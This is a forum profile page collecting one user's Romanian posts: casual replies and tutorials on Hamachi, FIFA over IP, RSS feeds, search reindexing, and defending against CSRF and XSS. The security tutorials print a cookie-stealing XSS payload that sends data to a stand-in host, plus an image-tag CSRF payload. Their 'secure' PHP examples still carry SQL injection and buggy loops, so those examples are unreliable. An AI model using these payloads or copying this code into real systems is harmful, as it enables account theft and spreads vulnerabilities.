Jump to content

chessh

Active Members
  • Posts

    73
  • Joined

  • Last visited

Everything posted by chessh

  1. chessh

    HelLo !!!

    Minte si tu mai frumos. Anyway...bine ai venit
  2. Neah...si asta e un tutorial mai vechi. Poate curand o sa fac unul cum sa-ti creezi propriul RSS Feed.
  3. Da-mi un exemplu prin care poti sa treci de formularele post. Inca invat securitatea web, asa ca doresc sa aud sfaturi. Corect. Da, asa m-am obisnuit. PS: Foarte bine gandita metoda ta. Intr-adevar, nu prea ai cum sa treci de ea.
  4. Mersi de completare moubik
  5. Nu stiu cum va suporta saracii de kw3rln sau Nemessis
  6. ce-i ala browser ???? on: am trecut si eu pe firefox 3 , e misto Ratat
  7. @excess: Ma bucur ca am fost de folos. @NEON: Chiar nu stiu ce sa zic...daca nu sunt la PC si nu am mai multe detalii, nu prea te pot ajuta.
  8. 1. E chessh nu chess. 2. Daca vreun admin considera reclama o sa scoata linkul. ON: Ce ratat e forumul PCtroubleshooting. Citez: Asa ca cine are chef sa-l sparga, succes IPB
  9. Aha bine ca mi-ai zis de pctroubleshooting. Se pare ca domnii de acolo sunt niste plagiatori. Sper sa nu se considere reclama, insa o sa dau urmatoarele link-uri. PC Troubleshooting: Reindexare pe Google: [url]http://pctroubleshooting.ro/index.php?showtopic=3971[/url] Reindexare pe Yahoo: [url]http://pctroubleshooting.ro/index.php?showtopic=3972[/url] Click4Trick (forumul meu): http://click4trick.com/tutoriale-diverse-f3/reindexarea-unui-domeniu-t4975.html O sa te rog sa te uiti la data scrierii articolelor. Numa' bine
  10. Mozilla Firefox 3 si eu
  11. Sa vezi si sa nu crezi. E facut de mine
  12. Ma bucur ca ti-am fost de folos.
  13. @TorQue9: Jet @restu': Sper ca v-a fost de folos. Daca nu, nu mai comentati aiurea p-aci.
  14. Mersi Ndrey Apropo pune '>=' ca daca e vreunul cu peste 20 @Hertz: Numele forumului e Tutoriale, nu tutoriale de securitate hackere. Daca se considera ca n-am postat bine, rog un admin/moderator sa-l stearga.
  15. N-am ce zice. Ai gandit prea tare cand ai dat reply.
  16. Instalare si folosire Hamachi(for n00bs) Hamachi este o aplicatie care permite stabilirea unei legaturi directe intre doua computere care altfel nu ar fi accesibile din cauza restrictiilor retelei (se afla in spatele unui firewall sau sunt conectate la Internet prin Connection Sharing sau router). Transferul de fisiere intre cele doua computere se face securizat, folosind algoritmi speciali de criptare. De asemenea puteti sa-l folositi pentru a juca diverse jocuri pe internet prin Direct IP (FIFA, Counter-Strike, Starcraft, etc.). NOTA Aveti nevoie de admin in Windows pentru a-l instala. Instalare 1) Click Next 2) Bifati I accept the agreement si apasati Accept 3) Alegeti setarile pe care le doriti si apoi click Next 4) Apasati Install 5) Click pe Next 6) Bifati Launch Hamachi si apasati Finish 7) Cam asa arata programul Configurare 8) Dati click pe butonul Configure Hamachi (rotita) 9) Alegeti Update Hamachi si asteptati sa se updateze (recomand acest pas) 10) Apasati din nou pe butonul Configure Hamachi (rotita), dar de data aceasta alegeti Preferences 11) Cam asa arata meniul Preferences. Aici alegeti setarile dupa bunul plac Utilizare 12) Dati click pe butonul Create or join networks (triunghiul) si aici veti avea 2 posibilitati: sa intrati pe o retea deja existenta sau sa va creati propria retea 13) Pentru a va conecta la o retea deja existenta alegeti Join an existing network .. 14) Aici va trebui sa introduceti numele si parola retelei (pe care trebuie sa le cunoasteti, bineinteles) si apasati Join 15) Daca va hotarati sa va creati propria retea alegeti Create a new network .. 16) Aici trebuie sa puneti un nume (unic) de retea si sa-i setati parola, iar in final dati click pe Create Cam atat. Succes! Pentru nelamuriri astept reply-ul vostru
  17. Cum sa joci FIFA pe net Poate v-ati intrebat cum puteti sa jucati FIFA cu un prieten pe net, pentru a va demonstra valoarea. Raspunsul vi-l dau eu: Foarte usor . Tot ce trebuie sa faceti este: 1) Intrati in FIFA. 2) Game modes. 3) Multiplayer. 4) Direct IP. 5) Aici aveti 2 variante: 1*) Sa gazduiti meciul, apasand pe Host. 2*) Sa va conectati la adversar, adaugand IP-ul lui (New->nume adversar->IP adversar->OK) si apasand Connect. 6) Veti fi conectat cu adversarul, putand astfel sa va disputati meciul. Note: 1) Este testat doar pe FIFA 07 si FIFA 08. 2) Nu puteti gazdui meciul daca aveti router si tot odata IP routabil (ex. 192.168.0.1), decat cu un program special gen Hamachi. 2) In timpul conexiunii nu parasiti jocul ca se va deconecta. Enjoy PS: Alt tutorial mai vechi
  18. Really? Nu vrei sa-ti dau eu link-ul original catre forumul meu?
  19. Cum sa ai feeduri RSS la tine pe site Cu ce te ajuta? Site-ul tau va contine cele mai tari articole, de pe cele mai tari site-uri fara ca tu sa le scrii. Cum se procedeaza? Iti explic imediat. Vei folosi un RSS Feeder care-ti va aduce stiri si articole de pe site-urile dorite. La inceput trebuie sa gasesti un script care va prelua articolele. Eu sugerez Magpierss-0.72 (pentru ca si eu il folosesc si pe baza lui e facut tutorialul) pe care il puteti gasi aici. Pentru a dezarhiva iti trebuie un program de arhivat si dezarhivat. Sugerez WinRAR. Dupa dezarhivarea folderului uploadeaza-l pe site-ul tau in root (public_html). Folderul trebuie sa se numeasca magpierss-0.72. Apoi trebuie creat un fisier PHP numit reader.php (un text document cu extensia .php) care sa contina urmatorul cod: <div class="content"> <?php require_once("magpierss-0.72/rss_fetch.inc"); # Aici este calea catre fetcher-ul de la magpie. define('MAGPIE_OUTPUT_ENCODING', 'utf-8'); # Aici este codul de pagina. $url = "http://www.idg.ro/rss/pcw_news.xml"; # Aici veti trece url-ul de unde veti prelua articolele. $rss = fetch_rss( $url ); $num_items = 10; # Aici veti seta numarul de articole care sa apara. $items = array_slice($rss->items, 0, $num_items); foreach ($items as $item) { $ahref = $item['link']; $title = $item['title']; $description = $item['description']; print "[b]<a href=$ahref>$title</a>[/b] $description "; } ?> </div> Uploadati fisierul reader.php pe site in root (public_html). Note: In loc de http://www.idg.ro/rss/pcw_news.xml puteti trece pagina XML a site-ului de pe care vreti sa preluati articolele. Pagina XML poate fii gasita apasand butonul RSS al site-ului respectiv. Cam atat. Succes si enjoy PS: E un tutorial mai vechi de-al meu.
  20. Reindexarea unui domeniu De multe ori se intampla ca motoarele de cautare sa va penalizeze numele de domeniu, mai ales daca in trecut a apartinut altcuiva, avand un trecut mai rau famat. In acest tutorial o sa va invat cum sa faceti ca domeniul vostru sa fie reindexat de motoarele de cautare importante, Google si Yahoo. Google: Pentru a fi reindexat de google, numele de domeniu trebuie verificat. Asa ca trebuie sa va logati pe contul de Webmaster (daca nu aveti cont va recomand sa va faceti unul pentru a beneficia de o indexare mai buna si de Google Analytics, cel mai bun provider de detalii despre traficul de pe site si multe alte tool-uri utile). Intrati apoi pe https://www.google.com/webmasters/tools/siteoverview unde veti adauga url-ul site-ului si apasati Add Site. Veti fi redirectionati catre pagina Overview, unde trebuie sa dati click pe link-ul cu numele Verify your site. Veti putea alege una din cele 2 metode de verificare: 1. Uploadarea unui fisier .html pe host. 2. Introducerea unui Meta Tag. Dupa ce ati ales una din cele 2 metode si ati aplicat-o, tot ce ramane de facut este sa apasati pe butonul Verify. Yahoo: Pentru a fi reindexat de Yahoo, numele de domeniu trebuie de asemenea verificat. Va trebui sa va logati pe contul de Yahoo! (sigur aveti din asta) si veti merge la https://siteexplorer.search.yahoo.com/mysites. Aici introduceti url-ul site-ului si apasati Add My Site. Dupa introducerea acestuia, va trebui sa dati click pe Authenticate, unde aveti de ales din 2 metode: 1. Uploadarea unui fisier .html pe host. 2. Introducerea unui Meta Tag. Dupa ce ati ales una din cele 2 metode si ati aplicat-o, tot ce ramane de facut este sa apasati pe butonul Ready to Authenticate corespunzator. Cam atat in acest tutorial. Sper sa va fie de folos.
  21. Cum sa te protejezi de CSRF Definitia CSRF-ului Un atac CSRF (Cross-Site Request Forgeries) reprezinta o vulnerabilitate a aplicatiilor web neprotejate. El consta intr-un link, pe care hackerul il poate folosi pentru a modifica continut. De obicei codul este scris in (X)HTML sau JavaScript. Scopul CSRF-ului Scopul acestui tip de atac este de a modifica continut, in numele unui utilizator sau chiar administrator, cu acest drept de acces (fara ca cei din urma sa afle). In general, aceste atacuri ii vizeaza pe toti utilizatorii. Despre CSRF Atacurile de acest tip falsifica anteturile cererilor HTTP, trimise in mod normal de catre browser la server (prin comunicarea intre cei doi). Ele folosesc de obicei elementul img (XHTML) si atributul sau, src, ce are ca valoare URL-ul unui script (nu al unei imagini, cum ar trebui sa fie in mod normal). Pentru a intelege mai bine, va voi face o schema, dupa care actioneaza majoritatea hackerilor. Hackerul intra pe site Hackerul scrie un mesaj (care provoaca vulnerabilitatea) Un utilizator intra pe pagina unde hackerul a scris mesajul Cererea HTTP este trimisa serverului Exemplu CSRF Va voi arata prin acest exemplu, cum un hacker poate sterge un anumit user, cunoscand scriptul atacat sau avand putin noroc. Vom crea o noua baza de date (folosind phpMyAdmin) numita csrf si tabelul users, cu doua campuri: user si pass. CREATE DATABASE csrf; USE csrf; CREATE TABLE users (id INT NOT NULL AUTO_INCREMENT, user VARCHAR(20) NOT NULL, pass VARCHAR(32) NOT NULL, PRIMARY KEY(id)); INSERT INTO users (user, pass) VALUES ('csrf', '123456'); Avem urmatorul script pentru stergerea unui utilizator de pe site: <html> <head> <title>Sterge utilizator</title> </head> <body> <?php if(isset($_GET['user']) && $_GET['user'] != '') { @mysql_connect('localhost', 'root', '') or die('MySQL error.'); @mysql_select_db('csrf') or die('MySQL error.'); $sql = "DELETE FROM users WHERE user='{$_GET['user']}'"; $result = @mysql_query($sql) or die('MySQL error.'); echo 'Utilizatorul '.$_GET['user'].' a fost sters.'; } else { ?> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="get"> Sterge utilizatorul: <input type="text" name="user" /> <input type="submit" name="submit" value="Delete" /> </form> <?php } ?> </body> </html> Acum sa vedem ce se intampla. Daca de exemplu, hackerul scrie un mesaj care contine urmatorul cod XHTML: [img=http://site.com/delete.php?user=csrf] Cererea HTTP va arata in felul urmator: GET /delete.php?user=csrf HTTP/1.1 HOST: [url]www.site.com[/url] Cookie: PHPSESSID=4c50d3f5e75cfd3b9df18da4f568cf07 Cand administratorul va intra pe pagina in care hackerul a postat mesajul ce contine codul de mai sus utilizatorul 'csrf' va fi sters. Pentru a preveni acest lucru, scriptul de stergere al utilizatorilor va trebui sa arate asa: <html> <head> <title>Sterge utilizator</title> </head> <body> <?php if(isset($_GET['user']) && $_GET['user'] != '') { if(isset($_POST['confirm']) && $_POST['value'] == 'yes') { @mysql_connect('localhost', 'root', '') or die('MySQL error.'); @mysql_select_db('csrf') or die('MySQL error.'); $sql = "DELETE FROM users WHERE user='{$_GET['user']}'"; $result = @mysql_query($sql) or die('MySQL error.'); echo 'Utilizatorul '.$_GET['user'].' a fost sters.'; } else { ?> <form action="<?php echo $_SERVER['PHP_SELF']; ?>?user=<?php echo $_GET['user']; ?>&<?php echo $_GET['submit']; ?>" method="post"> Sterge utilizatorul? Nu<input type="radio" name="value" value="no" checked />Da<input type="radio" name="value" value="yes" /> <input type="submit" name="confirm" value="Confirm" /> </form> <?php } } else { ?> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="get"> Sterge utilizatorul: <input type="text" name="user" /> <input type="submit" name="submit" value="Delete" /> </form> <?php } ?> </body> </html> O confirmare ce foloseste un formular cu metoda post este o modalitate buna de a preveni CSRF-ul in cazul nostru Prevenirea CSRF-ului Asadar, cum putem preveni atacurile CSRF? Cateva sfaturi bune ar fi: Folosirea metodei POST in formularele care produc modificari importante Folosirea unui formular de confirmare, ce foloseste metoda POST Folosirea variabilei de sesiune in linkuri ($_GET['session']) Sper sa va fie de folos. Daca am vreo greseala, va rog postati un reply.
  22. Cum sa te protejezi de XSS Definitia XSS-ului Un atac XSS (Cross-Site Scripting) reprezinta o vulnerabilitate a aplicatiilor web ce apare atunci cand acestea afisaza date care nu sunt valide. Acesta consta in introducerea unui cod, pentru executia acestuia in respectivul site. De obicei, codul este scris in unul din urmatoarele limbaje: JavaScript, (X)HTML, VBScript, ActiveX, Java sau Flash (ar mai fi si altele). Scopul XSS-ului Scopul acestui tip de atac este de a fura cookie-urile unor anumiti utilizatori sau pentru a fura diferite informatii utile despre utilizatori, necesare hackerilor. In general aceste atacuri ii vizeaza pe cei cu drepturi privilegiate ale aplicatiei web (administratori sau alt rang important). In general atacurile implica doua lucruri (hackerul si site-ul), insa XSS-ul implica trei (hackerul, site-ul si utilizatorii site-ului). Despre XSS Atacurile de acest tip se folosesc de datele ce vin din exterior. Asadar formularele, e-mail-ul web, fisierele de tip XML sau RSS si bazele de date sunt cel mai des folosite de hackeri. Pentru a intelege mai bine, va voi face o schema, dupa care actioneaza majoritatea hackerilor. Hackerul intra pe site Hackerul verifica daca vulnerabilitatea este prezenta In cazul in care site-ul este vulnerabil, el introduce date care vor fi stocate in baza de date Un utilizator intra pe o pagina a site-ului care se conecteaza la baza de date si afisaza datele stocate in aceasta (incluzand cele introduse de hacker) Cookie-urile utilizatorului sunt trimise hackerului Exemplu XSS Va voi arata prin acest exemplu, cum un hacker poate fura un cont cu ajutorul acestei vulnerabilitati. Vom crea o noua baza de date (folosind phpMyAdmin) numita xss si tabelul users, cu doua campuri: user si pass. CREATE DATABASE xss; USE xss; CREATE TABLE users (id INT NOT NULL AUTO_INCREMENT, user VARCHAR(20) NOT NULL, pass VARCHAR(32) NOT NULL, PRIMARY KEY(id)); Avem urmatorul script simplu de inregistrare: <html> <head> <title>Script inregistrare</title> </head> <body> <?php if(isset($_POST['submit'])) { $_POST['user'] = mysql_real_escape_string($_POST['user']); $_POST['pass'] = md5($_POST['pass']); @mysql_connect('localhost', 'root', '') or die('MySQL error.'); @mysql_select_db('xss') or die('MySQL error.'); $sql = "INSERT INTO users (user, pass) VALUES ('{$_POST['user']}', '{$_POST['pass']}')"; $result = @mysql_query($sql) or die('MySQL error.'); @mysql_close(); } else { ?> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> Username: <input type="text" name="user" /> Password: <input type="password" name="pass" /> <input type="submit" name="submit" value="Register" /> </form> <?php } ?> </body> </html> Acum, o parte din codul panoului de administrare a site-ului, in care sunt afisati utilizatorii inregistrati: <html> <head> <title>Panou de administrare</title> </head> <body> Utilizatori inregistrati: <?php @mysql_connect('localhost', 'root', '') or die('MySQL error.'); @mysql_select_db('xss') or die('MySQL error.'); $sql = "SELECT * FROM users"; $result = @mysql_query($sql) or die('MySQL error.'); while($result = mysql_fetch_array($result)) { echo $row['user'].' '; } ?> </body> </html> Acum sa vedem ce se intampla. Daca de exemplu, hackerul introduce in campul user urmatorul cod JavaScript: <script>alert("Ti-am spart site-ul!");</script> Cand administratorul va intra pe pagina care afisaza utilizatorii inregistrati, va aparea o caseta JavaScript care va afisa 'Ti-am spart site-ul!' (fara ghilimele). Pana acum, nimic grav. In cazul in care hackerul introduce codul urmator: <script>document.location = 'http://www.site.com/steal.php?cookies=' + document.cookie;</script> Cand administratorul va intra pe pagina care afisaza utilizatorii inregistrati, cookie-urile sale vor fi trimise catre 'http://www.site.com/steal.php' prin variabila $_GET['cookies']. Hackerul poate folosi aceste cookie-uri si poate capata acces in panoul de administrare. Pentru a preveni acest lucru, scriptul de afisare al utilizatorului va trebui sa arate asa: <html> <head> <title>Panou de administrare</title> </head> <body> Utilizatori inregistrati: <?php @mysql_connect('localhost', 'root', '') or die('MySQL error.'); @mysql_select_db('xss') or die('MySQL error.'); $sql = "SELECT * FROM users"; $result = @mysql_query($sql) or die('MySQL error.'); while($result = mysql_fetch_array($result)) { echo htmlentities($row['user']).' '; } ?> </body> </html> Asadar, functia htmlentities() este folosita pentru a preveni introducerea sau injectarea a unui astfel de cod, ea ignorand tag-urile. Prevenirea XSS-ului Asadar cum putem preveni atacurile XSS? Cateva functii PHP care ne vor ajuta sunt: htmlentities(); htmlspecialchars(); strip_tags(); mysql_escape_string(); mysql_real_escape_string(); addslashes(); Sper sa va fie de folos. Daca am vreo greseala, va rog postati un reply.
  23. chessh

    RST BLOG!

    n-arata rau bravo
  24. Felicitari STAFF-ului
×
×
  • Create New...